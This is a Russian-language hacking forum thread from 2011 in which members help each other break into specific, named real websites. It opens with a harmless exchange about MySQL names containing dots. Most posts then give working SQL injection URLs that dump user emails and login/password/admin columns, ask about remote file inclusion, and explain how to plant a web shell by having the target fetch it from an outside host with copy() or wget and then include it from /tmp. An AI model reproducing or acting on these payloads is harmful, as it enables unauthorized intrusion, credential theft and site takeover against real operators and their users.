Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее

    CREATE DATABASE `lo.l`;

    возвращает "Incorrect database name"
     
    _________________________
    1 person likes this.
  2. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать.
    Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...
     
    #18662 Breetonia, 18 Dec 2011
    Last edited: 18 Dec 2011
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    пробовал так? что отвечает браузер?

    поидее должно сработать
     
    _________________________
  4. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Блин,ну я и лох...реально же сработал твой вариант (SELECT * FROM `database`.`table.name`).Спасибо огромное )).Я думал,что апострофы браузер не понимает,ведь так во многих манах пишут...
    Вопрос остается открытым - как им удалось создать имя бд с точкой ?
    ЗЫ: Сипт идёт лесом,т.к. не обрабатывает апострофы...
     
    #18664 Breetonia, 18 Dec 2011
    Last edited: 18 Dec 2011
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    какая версия mysql?
     
    _________________________
  6. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    PHP:
    CREATE DATABASE `kiss.me`;
    CREATE TABLE  `kiss.me`.`and_love.me` (
    `
    its.okINT NOT NULL
    ENGINE INNODB;
    Это весьма забавно но:
    PHP:
    CREATE DATABASE  `!@#$%^&*(` ;
    CREATE TABLE  `!@#$%^&*(`.`#$%^&*(` (
    `
    )(*&^%$INT NOT NULL
    ENGINE INNODB;
    работает вполне адекватно :)
    PHP:
    INSERT INTO  `#$%^&*(
    VALUES (
    '123'
    );
    SELECT `)(*&^%$FROM `#$%^&*(WHERE 1;
    >> 
    123
     
    _________________________
    #18666 Expl0ited, 18 Dec 2011
    Last edited: 18 Dec 2011
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    у меня не катит,

    5.0.24а-community-nt
    5.0.51a-24+lenny5

    тоже не катит
    что у вас за базы? :D
    версию в студию плз
     
    _________________________
    #18667 Konqi, 18 Dec 2011
    Last edited: 18 Dec 2011
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    OK - version():5.5.8
    NOT - mysql Ver 14.12 Distrib 5.0.92, for redhat-linux-gnu (x86_64) using readline 5.1
     
    _________________________
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну все ясно, значит фича доступна начиная с версии 5.5 или как то так :)

    ибо все пятые версии провалились

    5.0.92-50-log
    5.0.24а-community-nt
    5.0.51a-24+lenny5
    5.0.92
     
    _________________________
  10. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Здравствуйте, есть RFI (пример _http://www.regentbs.ru/index2.php?id=http://www-sbras.nsc.ru/win/mathpub/page-html ), но возможно инклюдить только .html .
    Возможно ли залить шелл ?
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    wkar, file_get_contents - это не RFI. Можно только читать файлы.
     
    #18671 M_script, 19 Dec 2011
    Last edited: 19 Dec 2011
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Всем привет, подскажите почему не выводит нифига?

    PHP:
    http://festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28select+email+from+u1419187_alpha.jos_users+limit+1,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ясно, спасибо


    блин, немогу подобрать количество колонок
    PHP:
    http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
    уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
     
  14. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    как сюда шелл залить?
    http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;

    у тебя тут похоже эррор бейсед
     
    #18674 547, 19 Dec 2011
    Last edited: 19 Dec 2011
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(u13567_doy.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e,Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10,11,12,13,14--+
    e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
     
    _________________________
    #18675 Expl0ited, 19 Dec 2011
    Last edited: 19 Dec 2011
    1 person likes this.
  16. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    пробуй так
    wget http://твой сайт.com/shell.php
    или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")
     
  17. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    не получиться:

    Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

    я уже что только не пробовал...
    fopen,include,file_get_contents,copy.....
     
    #18677 547, 19 Dec 2011
    Last edited: 19 Dec 2011
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.
     
    _________________________
  19. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    залей шелл в тмп и инклуди, если так хочется
     
    _________________________
Thread Status:
Not open for further replies.